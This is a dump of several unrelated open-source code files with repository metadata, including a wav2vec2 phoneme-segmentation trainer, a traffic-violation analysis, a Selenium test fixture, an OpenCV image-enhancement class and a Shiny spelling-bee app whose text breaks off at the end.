len(str(self.resolution).split(\".\")[1]) if not isinstance(self.resolution,int) else 0\n d = {k:[] for k in ['start','end','label']}\n a = 0\n if len(arr) == 1:\n i = 0\n d['start'].append(round(a*self.resolution,dec))\n d['end'].append(round((i+1)*self.resolution,dec))\n label = self.tokenizer.decode(arr[i])\n d['label'].append(label)\n else:\n for i in range(len(arr)-1):\n if arr[i+1] != arr[i]: \n d['start'].append(round(a*self.resolution,dec))\n d['end'].append(round((i+1)*self.resolution,dec))\n label = self.tokenizer.decode(arr[i])\n d['label'].append(label)\n a = i+1\n d['start'].append(round(a*self.resolution,dec))\n d['end'].append(round((i+2)*self.resolution,dec))\n label = self.tokenizer.decode(arr[-1]) # the final run takes the label of the last frame\n d['label'].append(label)\n return d\n \n def get_t_end(self,phonemes_detail):\n phonemes_detail = eval(phonemes_detail) if type(phonemes_detail) is not dict else phonemes_detail\n return phonemes_detail['end'][-1] # end time of the last phoneme, not its label\n\n\n# Data generator\nclass PhonemeDetailsDataset(Dataset):\n \"\"\"\n Pytorch Dataset that reads a row of the metadata and returns \n the following items as dict:\n input_values: np.ndarray\n the audio array loaded by reading the column \n 'file_name' of a row in the metadata\n labels: 
str\n phonetic segmentation in string extract directly\n from column 'phonetic_detail' of a row in the\n metadata\n \n Attributes\n ---\n metadata: pd.DataFrame\n a pandas dataframe object that contains the \n informations about the audio \n data_dir: str\n the directory of all data, same as the directory \n where metadata.csv is located, default 'data'\n \n \"\"\"\n \n def __init__(self,metadata,data_dir='data'):\n self.metadata = metadata\n self.data_dir = data_dir\n \n def __len__(self):\n return len(self.metadata)\n \n def __getitem__(self,idx):\n row = self.metadata.iloc[idx,:]\n # audio input\n fpath = os.path.join(self.data_dir,row['file_name'])\n audio_input,sr = sf.read(fpath)\n # label\n label = row['phonetic_detail']\n # inputs\n example = {\"input_values\":audio_input,\"labels\":label}\n return example\n\n \n# Data processor/collator \nclass TrainingDataProcessor:\n \"\"\"\n Object that collates samples generated by \n PhonemeDetailsDataset as batch with desired format for \n huggingface transformers models to read. \n Can use as collate_fn for Pytorch Dataloader arguments\n \n Attributes\n ---\n sampling_rate: int\n sampeling rate of the audio \n resolution: float\n resolution of label segment in second \n tokenizer: PhonemeSegmentor\n tokenizer to translate phoneme_detail to array \n with size (batch,t,num_label), where t is \n t_end/resolution\n t_end: int\n length of array in sencod \n pad_to_sec: int\n nearest second the array pad to \n rtn_type: str\n tensor type to be return, currently only \n support pytorch 'pt' \n \n \"\"\"\n def __init__(self,sampling_rate,resolution,tokenizer,t_end=None,pad_to_sec=1,rtn_type='pt'):\n self.sampling_rate = sampling_rate\n self.resolution = resolution\n self.tokenizer = tokenizer\n self.t_end = t_end\n self.pad_to_sec = pad_to_sec\n self.rtn_type = rtn_type\n \n \n def __call__(self,inputs):\n audio_inputs,labels = [],[]\n t_end = self._get_max_t(inputs) if self.t_end is None else self.t_end\n for example in inputs:\n x = example[\"input_values\"]\n x = self.process_values(x,t_end)\n y = example[\"labels\"]\n y = self.process_labels(y,t_end)\n audio_inputs.append(x)\n labels.append(y)\n \n batch = self._rtn_batch(audio_inputs,labels)\n return batch\n \n def process_values(self,x,t_end):\n target_len = int(self.sampling_rate*t_end)\n pad_size = int(target_len - x.shape[0])\n if pad_size > 0:\n x = np.pad(x,(0,pad_size))\n elif pad_size < 0:\n x = x[:target_len]\n x = x.reshape(1,-1)\n return x\n \n def process_labels(self,y,t_end):\n # y = get_phonemes_segment(y,self.tokenizer,t_end,self.resolution)\n y = self.tokenizer.encode(y,t_end=t_end)\n y = np.reshape(y,(1,-1))\n return y\n \n def _get_max_t(self,inputs):\n # use 'input_values' max array length to calculate t \n maxlen = int(np.max([item['input_values'].shape[0] for item in inputs]))\n max_t = maxlen/self.sampling_rate\n pad_res = self.pad_to_sec if self.pad_to_sec is not None else self.resolution\n max_t = np.ceil(max_t/pad_res)*pad_res\n return max_t \n \n def _rtn_batch(self,audio_inputs,labels):\n if self.rtn_type == 'pt':\n audio_inputs = np.concatenate(audio_inputs)\n audio_inputs = torch.Tensor(audio_inputs)\n labels = np.concatenate(labels)\n labels = torch.Tensor(labels).long()\n else:\n raise ValueError(f\"Currently not support type: '{self.rtn_type}'\")\n return {\"input_values\":audio_inputs,\"labels\":labels}\n\n\n# loss \ndef nll_loss(logits,labels):\n logits = logits.reshape(-1,logits.shape[-1])\n labels = labels.flatten()\n loss = 
torch.nn.functional.cross_entropy(logits, labels, reduction=\"mean\")\n return loss\n\n\n# metric\ndef avg_sample_acc(predictions, references):\n \"\"\"calculate the accuracy of each sample in a batch and average the score\"\"\"\n if len(predictions) != len(references):\n raise ValueError(f\"length not equal: {len(predictions)} != {len(references)}\")\n if predictions.shape[1] != references.shape[1]:\n raise ValueError(f\"Time interval not equal\")\n if len(predictions.shape) != 3 or len(references.shape) != 2:\n raise ValueError(\"Dim not correct\")\n predictions = np.argmax(predictions,axis=-1) \n sample_accs = [metrics.accuracy_score(ref,pred) for ref,pred in zip(references,predictions)]\n avg = np.mean(sample_accs)\n return {'avg_sample_acc': avg}\n \n\ndef compute_avg_sample_acc(pred):\n \"\"\"wrapping function to feed HF style prediction into metric \"\"\"\n p = pred.predictions\n r = pred.label_ids\n return avg_sample_acc(p, r)\n\n\n# trainer\nclass CustomTrainer(Trainer):\n def compute_loss(self, model, inputs, return_outputs=False):\n labels = inputs.get(\"labels\")\n # forward pass\n outputs = model(**inputs)\n logits = outputs.get(\"logits\")\n loss = nll_loss(logits,labels)\n return (loss, outputs) if return_outputs else loss\n\n\ndef test_dataflow(model,dataset,data_collator,batch_size=2):\n \n dl = DataLoader(dataset=dataset,batch_size=batch_size,collate_fn=data_collator)\n example_inputs = next(iter(dl))\n input_values = example_inputs['input_values']\n labels = example_inputs['labels']\n \n if torch.cuda.is_available():\n model = model.cuda()\n input_values = input_values.cuda()\n labels = labels.cuda()\n\n print(\"example_inputs['input_values'].shape: \",example_inputs['input_values'].shape)\n print(\"example_inputs['labels'].shape: \",example_inputs['labels'].shape)\n\n with torch.no_grad():\n example_outputs = model(input_values,labels)\n\n logits = example_outputs.logits\n\n print(\"loss: \",nll_loss(logits,labels))\n \n if torch.cuda.is_available():\n model = model.cpu()\n logits = logits.cpu()\n labels = labels.cpu()\n \n print(\"metric: \",avg_sample_acc(logits,labels))\n return\n\n\ndef train(\n mode,\n model_checkpoint,\n train_locales,\n test_locales,\n sampling_rate,\n resolution,\n t_end,\n pad_to_sec,\n training_config,\n datadir,\n output_data_dir,\n num_encoders,\n num_convprojs,\n conv_hid_actv,\n conv_last_actv,\n **kwargs\n ):\n \n # compute config\n transformers.utils.logging.set_verbosity_error()\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n torch.backends.cuda.matmul.allow_tf32 = torch.cuda.is_available()\n \n if model_checkpoint is None:\n model_checkpoint = \"speech31/wav2vec2-large-english-phoneme-v2\"\n print(f\"Using checkpoint: {model_checkpoint}\")\n\n # save_subfolder config\n output_dir = output_data_dir\n output_mdl_dir = os.path.join(output_dir,'models') \n output_log_dir = os.path.join(output_dir,'logs') \n\n # data config\n data_dir = datadir\n metadata_dir = os.path.join(data_dir,'metadata.csv')\n if not os.path.exists(metadata_dir):\n raise Exception(f'Metadata does not existed, datadir: {os.listdir(data_dir)}')\n \n train_metadata = get_metadata(metadata_dir,'train',train_locales) \n valid_metadata = get_metadata(metadata_dir,'dev',test_locales) \n trainset = PhonemeDetailsDataset(train_metadata,data_dir) \n validaset = PhonemeDetailsDataset(valid_metadata,data_dir) \n print(f\"language\\n training:{train_locales} length: {len(trainset)}\\n test:{test_locales} length: {len(validaset)}\")\n \n # model and 
data-processor config \n hf_config = AutoConfig.from_pretrained(model_checkpoint)\n tokenizer_type = hf_config.model_type if hf_config.tokenizer_class is None else None\n hf_config = hf_config if hf_config.tokenizer_class is not None else None\n \n pad_token=\"(...)\"\n unk_token=\"UNK\"\n tokenizer = AutoTokenizer.from_pretrained(\n \"./\",\n config=hf_config,\n tokenizer_type=tokenizer_type,\n unk_token=unk_token,\n pad_token=pad_token,\n )\n \n segmentor = PhonemeSegmentor(tokenizer=tokenizer,resolution=resolution,pad_token=pad_token)\n data_collator = TrainingDataProcessor(\n sampling_rate=sampling_rate,\n resolution=resolution, \n t_end=t_end, \n pad_to_sec=pad_to_sec, \n tokenizer=segmentor \n )\n\n model = CustomWav2Vec2Segmentation(\n model_checkpoint,\n num_labels=tokenizer.vocab_size,\n num_encoders=num_encoders,\n num_convprojs=num_convprojs,\n conv_hid_actv=conv_hid_actv,\n conv_last_actv=conv_last_actv,\n resolution=resolution\n )\n \n if kwargs.get('freeze_encoder'):\n model.change_grad_state('encoder',range(30),False)\n \n training_config.update(\n output_dir=output_mdl_dir,\n logging_dir=output_log_dir,\n group_by_length = False, \n remove_unused_columns = False,\n optim=\"adafactor\", # <------------------------------------------- check necessity \n gradient_checkpointing=False, # <------------------------------------------- check necessity \n gradient_accumulation_steps=4,\n fp16=torch.cuda.is_available(),\n tf32=torch.cuda.is_available(),\n )\n\n training_args = TrainingArguments(**training_config)\n\n trainer = CustomTrainer(\n model=model,\n data_collator=data_collator, \n args=training_args,\n compute_metrics=compute_avg_sample_acc,\n train_dataset=trainset,\n eval_dataset=validaset,\n )\n \n print(\"Training runs on: \",training_args.device)\n\n if mode == \"train\":\n \n print(f\"Mode '{mode}'\")\n print(\"***** Training start *****\")\n \n trainer.train()\n\n eval_result = trainer.evaluate(eval_dataset=validaset)\n\n print(f\"***** Eval results *****\")\n write_json(eval_result,os.path.join(output_log_dir,'eval_result.json')) \n\n # Saves the model to s3\n trainer.save_model(output_mdl_dir) \n \n elif mode == \"debug\":\n \n print(f\"Mode '{mode}'\")\n \n test_dataflow(model,trainset,data_collator)\n \n else:\n \n print(f\"Mode {mode} not recognised, no process proceed\")\n \n print(\"***** Completed *****\")\n \n return\n\n\nif __name__ == \"__main__\":\n \n # arg \n config_files = ['segmentation_config.json','training_config.json',]\n configs = [read_json(c) for c in config_files]\n \n parser = argparse.ArgumentParser()\n \n for config in configs:\n add_argument_from_default_config(parser,config)\n \n parser.add_argument('--datadir', type=str, default='data')\n parser.add_argument(\"--output_data_dir\", type=str, default='outputs')\n \n args, _ = parser.parse_known_args()\n \n args_dic = extract_args_by_default_config(args,configs[0])\n args_dic['training_config'] = extract_args_by_default_config(args,configs[1])\n args_dic['output_data_dir'] = args.output_data_dir\n args_dic['datadir'] = args.datadir\n \n print(\"ARGS:\\n\",args_dic,\"\\n\")\n train(**args_dic)\n","repo_name":"hslau44/common-phone","sub_path":"segmentation.py","file_name":"segmentation.py","file_ext":"py","file_size_in_byte":16685,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"13960375306","text":"# -*- coding: utf-8 -*-\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\n# Read file and take only the first 10000 rows 
with applicable columns.\r\n# Apparently the graphs look different and better on the larger (original) file.\r\n# But for efficiency let's stick with these. :-)\r\ndata = pd.read_csv(\"Traffic_Violations.csv\", nrows = 10000)\r\ndf = pd.DataFrame(data, columns = [\"Date Of Stop\", \"Time Of Stop\", \"Description\", \"SubAgency\", \"VehicleType\", \"Latitude\", \"Longitude\", \"Accident\", \"Belts\", \"State\", \"Geolocation\"]) \r\n# After initial analysis we realized that we have agencies with the names S15 and W15\r\n# but they do not have any violations registered and we removed those rows.\r\ndf = df[(df.SubAgency != \"S15\") & (df.SubAgency !=\"W15\")]\r\nprint(str(len(df)) + \" records were read from this file\")\r\n\r\nprint(\"Feature #1\")\r\nprint(\"=\"*70)\r\n# Plotting the distribution of violations per district by SubAgency\r\ndf1 = df.groupby(\"SubAgency\").count()\r\nx = df1.index.tolist()\r\n# check what the list of districts looks like\r\nprint(\"We have data for the following districts:\")\r\nfor i in x:\r\n print(i)\r\n\r\n# shortening the names in the list for better visualization & populating x and y axis\r\nx1 = []\r\nfor i in range(len(x)):\r\n b = \"dist\" + str((i+1))\r\n x1.append(b)\r\ny = df1[\"Description\"].tolist()\r\n\r\nplt.plot(x1, y)\r\nplt.xlabel(\"District\")\r\nplt.ylabel(\"Traffic Violations\")\r\nplt.title(\"Violations per district\")\r\n# renaming the yticks for better visualization. It makes sense only for the \r\n# original (larger) file\r\nplt.yticks([0,50000,100000,150000,200000,250000,300000,350000],[\"0\",\"50K\",\"100K\",\"150K\",\"200K\",\"250K\",\"300K\",\"350K\"])\r\nplt.show()\r\n# the graph visualization looks much better (and different) when applied to the whole dataset\r\n# sorting the # of violations per district and displaying the max\r\ndf1 = df1.sort_values(by = [\"Time Of Stop\"], ascending = False)\r\ndf1 = df1[\"Time Of Stop\"]\r\nprint(\"Top 3 agencies with most violations\")\r\nprint(df1.head(3))\r\n\r\nprint(\"\\nFeature #2\")\r\nprint(\"=\"*70)\r\n# Filtering only the violations resulting in an accident.\r\ndf2 = df[df['Accident'] == \"Yes\"]\r\ndf2['Time Of Stop'] = pd.to_datetime(df2['Time Of Stop'])\r\ndf2 = df2.groupby(pd.Grouper(key='Time Of Stop', freq='1H'))\r\n# plotting the distribution of violations resulting in an accident relative to time of occurrence\r\ndf2['Accident'].count().plot()\r\nplt.ylabel(\"Number of Accidents\")\r\nplt.title(\"Accidents Distribution in 24 hours\")\r\nplt.show()\r\n","repo_name":"mdevis1/project-share","sub_path":"Step0.py","file_name":"Step0.py","file_ext":"py","file_size_in_byte":2440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"30918692141","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver.chrome.options import Options as OptionsChrome\nfrom selenium.webdriver.firefox.options import Options as OptionsFirefox\n\n\ndef pytest_addoption(parser): # reads the browser/language parameters from the console\n parser.addoption('--browser_name', action='store', default='chrome',\n help=\"Choose browser: chrome or firefox\")\n parser.addoption('--language', action='store', default=\"en\",\n help=\"Choose language\")\n\n\n@pytest.fixture(scope=\"function\")\ndef browser(request):\n browser_name = request.config.getoption(\"browser_name\") # use the variable passed in from the command line\n language = request.config.getoption(\"language\")\n browser = None\n if browser_name == \"chrome\":\n options = OptionsChrome()\n 
options.add_experimental_option('prefs', {'intl.accept_languages': language})\n print(f\"\\n{language}\")\n print(\"\\nstart chrome browser for test..\")\n browser = webdriver.Chrome(options=options)\n elif browser_name == \"firefox\":\n options = OptionsFirefox()\n options.set_preference(\"intl.accept_languages\", language)\n browser = webdriver.Firefox(options=options)\n print(f\"\\n{language}\")\n print(\"\\nstart firefox browser for test..\")\n else:\n raise pytest.UsageError(\"--browser_name should be chrome or firefox\")\n yield browser\n print(\"\\nquit browser..\")\n browser.quit()\n","repo_name":"Evgen-QA/Autotests_Python","sub_path":"conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":1538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9424376255","text":"\"\"\" Newsletter Serializers. \"\"\"\n\n# Django rest framework\nfrom rest_framework import serializers\n\n# Models\nfrom contact.models import NewsletterContact\n\nclass NewsletterContactModelSerializer(serializers.ModelSerializer):\n \"\"\" Newsletter contact model serializer. \"\"\"\n \n class Meta(): \n \"\"\" Meta class. \"\"\"\n model = NewsletterContact\n fields = (\n 'id',\n 'email',\n 'ip_address',\n 'user_agent',\n 'status'\n )","repo_name":"Kionashi/diversidiomas-api","sub_path":"contact/serializers/newsletter.py","file_name":"newsletter.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11617291229","text":"import lldb\n\ndebugger_copy = None\nresult_copy = None\n\n\ndef save_debugger(debugger, command, context, result, internal_dict):\n global debugger_copy, result_copy\n debugger_copy = debugger\n result_copy = result\n result.AppendMessage(str(debugger))\n result.SetStatus(lldb.eReturnStatusSuccessFinishResult)\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/commands/command/script/persistence.py","file_name":"persistence.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"21505408362","text":"from ast import Assert\nimport os\nimport glob\nfrom typing import Tuple\nimport cv2 as cv\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom math import sqrt\nfrom pathlib import Path\n\ndef move_figure(f, x, y):\n backend = matplotlib.get_backend()\n if backend == 'TkAgg':\n f.canvas.manager.window.wm_geometry(\"+%d+%d\" % (x, y))\n elif backend == 'WXAgg':\n f.canvas.manager.window.SetPosition((x, y))\n else:\n # This works for QT and GTK\n f.canvas.manager.window.move(x, y)\n\n''' ---------------\n This function returns, to a given natural number x,\n the nearest number b such that x <= b*b holds.\n'''\ndef nearest_perfect_square(x):\n y = x\n max_iter = 1000\n while(max_iter > 1):\n b = int(sqrt(y))\n if b*b == y:\n break\n else:\n y += 1\n max_iter -= 1\n return b\n\n''' ---------------\n This class manages the directory \"data\" in the working directory\n and their files in it.\n Attributes:\n - subdir_names: list of strings of subdirectories in data\n - subdir_paths: dictionary consisting of the paths to each\n subdirectory with the corresponding key from\n subdir_names.\n - subdir_filenames: dictionary consisting of all the png-filenames in each\n subdirectory with the corresponding key from\n subdir_names.\n - subdir_paths_of_filenames: dictionary consisting of the paths to each\n 
filename with the corresponding key from\n subdir_names.\n Methods:\n Are described at their definitions below.\n'''\nclass DataFiles():\n def __init__(self, cwd: str) -> None:\n data_dir = cwd + '/data'\n data_subdir = os.listdir(data_dir)\n\n subdir_names = []\n\n for i in range(len(data_subdir)):\n # Keep only subdirectories\n if os.path.isdir(data_dir + '/' + data_subdir[i]):\n # Keep only non-empty subdirectories\n if os.listdir(data_dir + '/' + data_subdir[i]):\n subdir_names.append(data_subdir[i])\n\n self.subdir_names = subdir_names\n\n subdir_paths = {}\n for i in range(len(subdir_names)):\n subdir_paths[subdir_names[i]] = data_dir + '/' + subdir_names[i]\n \n self.subdir_paths = subdir_paths\n\n subdir_filenames = {}\n for i in range(len(subdir_names)):\n subdir_filenames[subdir_names[i]] = [os.path.basename(x) for x in glob.glob(self.subdir_paths[subdir_names[i]] + '/*.png')]\n \n self.subdir_filenames = subdir_filenames\n\n subdir_paths_of_filenames = {}\n for i in range(len(subdir_names)):\n temp_lst = []\n for j in range(len(self.subdir_filenames[subdir_names[i]])):\n temp_lst.append(self.subdir_paths[subdir_names[i]] + '/' + self.subdir_filenames[subdir_names[i]][j])\n subdir_paths_of_filenames[subdir_names[i]] = temp_lst\n\n self.subdir_paths_of_filenames = subdir_paths_of_filenames \n\n ''' ---------------\n Function to return a list of the filenames in a given subdirectory \n '''\n def get_subdir_filenames(self, subdirname) -> list:\n try:\n filenames = []\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n filenames = self.subdir_filenames[subdirname]\n return filenames\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Function to return the path (string) of a given filename in a given subdirectory \n '''\n def get_subdir_filename_path(self, subdirname, filename) -> str:\n try:\n filename_path = '' \n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n assert filename in self.subdir_filenames[subdirname], \"No file in directory {} with this name!\".format(subdirname)\n img_index = self.subdir_filenames[subdirname].index(filename)\n filename_path = self.subdir_paths_of_filenames[subdirname][img_index]\n return filename_path\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Function returns the bgr-image (as read by opencv.imread) for a specific filename.\n - subdirname: name of the subdirectory which contains the desired image\n - filename: the image from which we want the bgr-format\n '''\n def get_img_from_filename(self, subdirname, filename):\n try:\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n assert filename in self.subdir_filenames[subdirname], \"No file in directory {} with this name!\".format(subdirname)\n img_index = self.subdir_filenames[subdirname].index(filename)\n img_bgr = cv.imread(self.subdir_paths_of_filenames[subdirname][img_index])\n return img_bgr\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Function to get a list of all images in a given subdirectory\n in form of numpy arrays from cv.imread\n - img_of_files: list of the images as numpy arrays (bgr-format)\n '''\n def make_img_list(self, subdirname) -> list:\n try:\n img_of_files = []\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n num_files = len(self.subdir_filenames[subdirname])\n for i in range(num_files):\n img = cv.imread(self.subdir_paths_of_filenames[subdirname][i])\n img_of_files.append(img)\n\n return img_of_files\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Provides a simple plot of a specific 
image, given by a filename,\n in a given subdirectory.\n '''\n def plot_specific_image_by_name(self, subdirname, imagename):\n try:\n assert subdirname in self.subdir_names, \"No subdirectory with this name!\"\n assert imagename in self.subdir_filenames[subdirname], \"No file with this name in subdirectory {}\".format(subdirname)\n img = cv.imread(self.subdir_paths[subdirname] + '/' + imagename)\n rgb_img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n fig, ax = plt.subplots(figsize = (12, 8), layout = 'constrained')\n ax.set_title('Image: {} in folder: {}'.format(imagename, subdirname))\n ax.imshow(rgb_img)\n move_figure(fig, 0, 0)\n plt.show()\n except AssertionError as msg:\n print(msg)\n\n ''' ---------------\n Provides a simple plot of a specific image, given in bgr-format.\n '''\n def plot_specific_image(self, img):\n rgb_img = cv.cvtColor(img, cv.COLOR_BGR2RGB)\n fig, ax = plt.subplots(figsize = (12, 8), layout = 'constrained')\n ax.set_title('Image')\n ax.imshow(rgb_img)\n move_figure(fig, 0, 0)\n plt.show()\n\n ''' ---------------\n Function to plot two images in numpy-array format; this function should be\n used to compare those two images.\n - img1_bgr: image on the left side of the subplot in bgr-format from opencv.imread\n - img2_bgr: image on the right side of the subplot in bgr-format from opencv.imread\n - save: bool, when true the plot will be saved\n - description: str of the possible modification of the right-side image\n '''\n def plot2img(self, \n img1_bgr, \n img2_bgr,\n save, \n description):\n rgb_img1 = cv.cvtColor(img1_bgr, cv.COLOR_BGR2RGB)\n rgb_img2 = cv.cvtColor(img2_bgr, cv.COLOR_BGR2RGB)\n fig = plt.figure(figsize = (12, 8))\n ax1 = fig.add_subplot(121)\n ax2 = fig.add_subplot(122)\n ax1.imshow(rgb_img1), ax1.set_title('Original')\n ax2.imshow(rgb_img2), ax2.set_title('Output (%s)' % description)\n if save:\n p = Path('C:/Users/markorb/git/defect_detection/data/test/points/punktuell_vergleich_2.png')\n plt.savefig(p)\n move_figure(fig, 0, 0)\n plt.show() \n \n ''' ---------------\n Plots the original image together with five contrast-enhancement\n variants (standard histogram equalization and CLAHE in gray, HSV,\n Lab and YUV) in a single figure.\n - img: original image in bgr-format from opencv.imread\n '''\n def plot_all_transforms(self, img):\n\n descriptions = ['Original', 'Std Histogram Eq.', 'CLAHE in gray', \n 'CLAHE in HSV', 'CLAHE in Lab', 'CLAHE with YUV']\n img_transforms_bgr = {}\n img_transforms_bgr[descriptions[0]] = img\n img_transforms_bgr[descriptions[1]] = self.get_EqualHist_img(img)\n img_transforms_bgr[descriptions[2]] = self.get_Clahe_img_gray(img)\n img_transforms_bgr[descriptions[3]] = self.get_Clahe_img_hsv(img)\n img_transforms_bgr[descriptions[4]] = self.get_Clahe_img_lab(img)\n img_transforms_bgr[descriptions[5]] = self.get_Clahe_img_yuv(img)\n\n img_transforms = {}\n for i in range(len(descriptions)):\n img_transforms[descriptions[i]] = cv.cvtColor(img_transforms_bgr[descriptions[i]], cv.COLOR_BGR2RGB)\n \n ''' ---------------\n Compute necessary rows and columns for the subplots\n depending on the number of images.\n '''\n num_images = len(descriptions)\n col = nearest_perfect_square(num_images)\n # Necessary rows\n row = num_images//col\n if num_images % col != 0:\n row += 1\n\n figure = plt.figure(figsize=(12, 8))\n \n # Create a position 
index\n position = range(1, len(descriptions) + 1)\n for i in range(len(descriptions)):\n ''' ---------------\n Place each image at its position in the row x col grid\n of subplots.\n '''\n ax = figure.add_subplot(row, col, position[i])\n ax.imshow(img_transforms[descriptions[i]])\n ax.set_title(descriptions[i])\n \n move_figure(figure, 0, 0)\n plt.show()\n\n ''' ---------------\n This method returns a grayscale image (converted back to bgr-format) \n after applying a CLAHE transform.\n - img: the bgr-image which should be transformed\n - clipLimit/tileGridSize: are used for the CLAHE object, since we are \n using an adaptive histogram equalization \n '''\n def get_Clahe_img_gray(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR image into grayscale \n gray_image = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n img_gray_histeq = clahe.apply(gray_image)\n return cv.cvtColor(img_gray_histeq, cv.COLOR_GRAY2BGR)\n\n ''' ---------------\n This method returns a bgr-image after applying a CLAHE transform in the value plane\n of the corresponding HSV-image.\n - img: the bgr-image which should be transformed\n - clipLimit/tileGridSize: are used for the CLAHE object, since we are \n using an adaptive histogram equalization \n '''\n def get_Clahe_img_hsv(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR image into the HSV color space \n hsv_image = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n ''' ---------------\n Applying contrast-limited adaptive histogram equalization onto the\n layer which describes the intensity of the image in the\n corresponding color space.\n ''' \n hsv_image[:,:,2] = clahe.apply(hsv_image[:,:,2])\n return cv.cvtColor(hsv_image, cv.COLOR_HSV2BGR)\n\n ''' ---------------\n This method returns a bgr-image after applying a CLAHE transform in the lightness (L) plane\n of the corresponding Lab-image.\n - img: the bgr-image which should be transformed\n - clipLimit/tileGridSize: are used for the CLAHE object, since we are \n using an adaptive histogram equalization \n '''\n def get_Clahe_img_lab(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR image into the Lab color space \n lab_image = cv.cvtColor(img, cv.COLOR_BGR2Lab)\n lab_image[:,:,0] = clahe.apply(lab_image[:,:,0])\n return cv.cvtColor(lab_image, cv.COLOR_Lab2BGR) \n \n ''' ---------------\n Same as above, but the CLAHE transform is applied to the luma (Y) plane\n of the corresponding YUV-image.\n '''\n def get_Clahe_img_yuv(self, img, \n clipLimit = 2.0, \n tileGridSize = (8, 8)):\n clahe = cv.createCLAHE(clipLimit = clipLimit,\n tileGridSize = tileGridSize)\n # Convert the BGR image into the YUV color space \n yuv_image = cv.cvtColor(img, cv.COLOR_BGR2YUV)\n yuv_image[:,:,0] = clahe.apply(yuv_image[:,:,0])\n return cv.cvtColor(yuv_image, cv.COLOR_YUV2BGR) \n \n ''' ---------------\n This method returns a bgr-image after applying a standard \n histogram equalization with equalizeHist in the value plane\n of the corresponding HSV-image.\n - img: the bgr-image which should be transformed\n ''' \n def get_EqualHist_img(self, img):\n img_hsv = cv.cvtColor(img, cv.COLOR_BGR2HSV)\n img_hsv[:,:,2] = cv.equalizeHist(img_hsv[:,:,2])\n return cv.cvtColor(img_hsv, cv.COLOR_HSV2BGR)\n\n ''' ---------------\n This method returns a bgr-image after applying a Gaussian blur\n to it.\n '''\n def get_Gaussian_blurred_img(self,\n img,\n kernel_size = (3, 
3),\n std_dev_x = 0.5,\n std_dev_y = 0.5\n ):\n img_blurred = cv.GaussianBlur(img, ksize = kernel_size, sigmaX = std_dev_x, sigmaY = std_dev_y)\n return img_blurred","repo_name":"ManneKo13/defect_detection","sub_path":"src/data_preparation.py","file_name":"data_preparation.py","file_ext":"py","file_size_in_byte":14602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18563559939","text":"def solution(lottos, win_nums):\n # First, count how many entries of lottos match win_nums.\n # The best possible rank is obtained when every 0 (hidden number) is a match;\n # the worst possible rank is when every 0 is a miss.\n answer = []\n count_0 = 0\n count_match = 0\n \n # number of hidden numbers (zeros)\n for i in lottos:\n if i == 0:\n count_0 += 1\n \n # number of matching numbers\n for i in win_nums:\n if i in lottos:\n count_match += 1\n \n # best (highest) prize rank\n max_rank = 7 - (count_0 + count_match)\n if max_rank == 7:\n max_rank = 6\n \n # worst (lowest) prize rank\n min_rank = 7 - count_match\n if min_rank == 7:\n min_rank = 6\n \n answer.append(max_rank)\n answer.append(min_rank)\n \n return answer","repo_name":"bunedin81/coding_test","sub_path":"Programmers/로또의 최고 순위와 최저 순위.py","file_name":"로또의 최고 순위와 최저 순위.py","file_ext":"py","file_size_in_byte":758,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18967533384","text":"from shiny import App, render, ui, reactive\nimport traceback\nfrom Solver import *\n\n\napp_ui = ui.page_fluid(\n ui.h2(\"Spelling Bee Solver\"),\n ui.input_text(id='puzzle', label='Puzzle (center letter first):', value='manitob', placeholder='abcdefg (center letter first)'),\n ui.input_action_button(\"solveit\", \"Solve Puzzle!\", class_=\"btn-success\"),\n ui.div(\"This may take a few seconds.\"),\n ui.h3(\"Pangrams\"),\n ui.output_text(\"pangrams\"),\n ui.h3(\"Solutions\"),\n ui.output_table(\"table\"),\n)\n\n\ndef server(input, output, session):\n @reactive.Calc\n @reactive.event(input.solveit, ignore_none=False)\n def getAllFoundWords():\n puzzleValue = input.puzzle()\n try:\n allFoundWords = solvePuzzle(puzzleValue)\n return allFoundWords\n except Exception as e:\n exceptionData = traceback.format_exc().splitlines()[-2:]\n ui.notification_show(\"\\n\".join(exceptionData), duration=None)\n raise e\n\n @output\n @render.table\n def table():\n return convertToDF(getAllFoundWords())\n\n @output\n @render.text\n @reactive.event(input.solveit, ignore_none=False)\n def pangrams():\n foundPangrams = findPangrams(puzzleValue=input.puzzle(), allFoundWords=getAllFoundWords())\n return 